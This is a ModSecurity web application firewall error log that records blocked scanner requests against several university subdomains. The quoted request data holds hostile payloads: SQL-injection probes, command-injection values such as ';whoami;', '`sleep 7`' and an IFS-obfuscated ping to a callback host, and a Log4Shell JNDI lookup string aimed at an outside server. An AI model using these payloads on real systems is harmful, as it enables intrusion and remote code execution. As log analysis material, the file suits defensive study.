[Tue Aug 29 11:33:23.301671 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARv7QAAAAAY"]
[Tue Aug 29 11:33:23.358234 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARjjLoAAAAL"]
[Tue Aug 29 11:33:23.359259 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARwusAAAAAZ"]
[Tue Aug 29 11:33:23.359706 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARpgyYAAAAU"]
[Tue Aug 29 11:33:23.382751 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARnmJEAAAAR"]
[Tue Aug 29 11:33:24.307700 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARiDmcAAAAJ"]
[Tue Aug 29 11:33:24.332626 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARjjL0AAAAL"]
[Tue Aug 29 11:33:24.335904 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARnmJMAAAAR"]
[Tue Aug 29 11:33:24.336179 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARpgykAAAAU"]
[Tue Aug 29 11:33:24.342133 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlgtmeq6ymkaoh7m.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARQ39sAAAAB"]
[Tue Aug 29 11:33:24.365659 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARo8yAAAAAT"]
[Tue Aug 29 11:33:24.379170 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlg4jrcik61udrmi.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARfwksAAAAI"]
[Tue Aug 29 11:33:25.309126 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAARo8yEAAAAT"]
[Tue Aug 29 11:33:25.315535 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARdiJEAAAAK"]
[Tue Aug 29 11:33:25.319456 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAAQKOkEAAAAs"]
[Tue Aug 29 11:33:25.341201 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARpgywAAAAU"]
[Tue Aug 29 11:33:25.348686 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAARy-tEAAAAb"]
[Tue Aug 29 11:33:25.352794 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARfwk0AAAAI"]
[Tue Aug 29 11:33:25.353221 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAAQKOkIAAAAs"]
[Tue Aug 29 11:33:25.355262 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARt-8oAAAAV"]
[Tue Aug 29 11:33:25.356283 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARzXx4AAAAd"]
[Tue Aug 29 11:33:25.362096 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARo8yMAAAAT"]
[Tue Aug 29 11:33:25.368901 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARjjMIAAAAL"]
[Tue Aug 29 11:33:25.373101 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARiDm4AAAAJ"]
[Tue Aug 29 11:33:25.374911 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARu2rkAAAAW"]
[Tue Aug 29 11:33:26.397009 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARA7gEAAAAA"]
[Tue Aug 29 11:33:26.408767 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgikh5hj88qs6yb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARy-tMAAAAb"]
[Tue Aug 29 11:33:26.441148 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARdiJQAAAAK"]
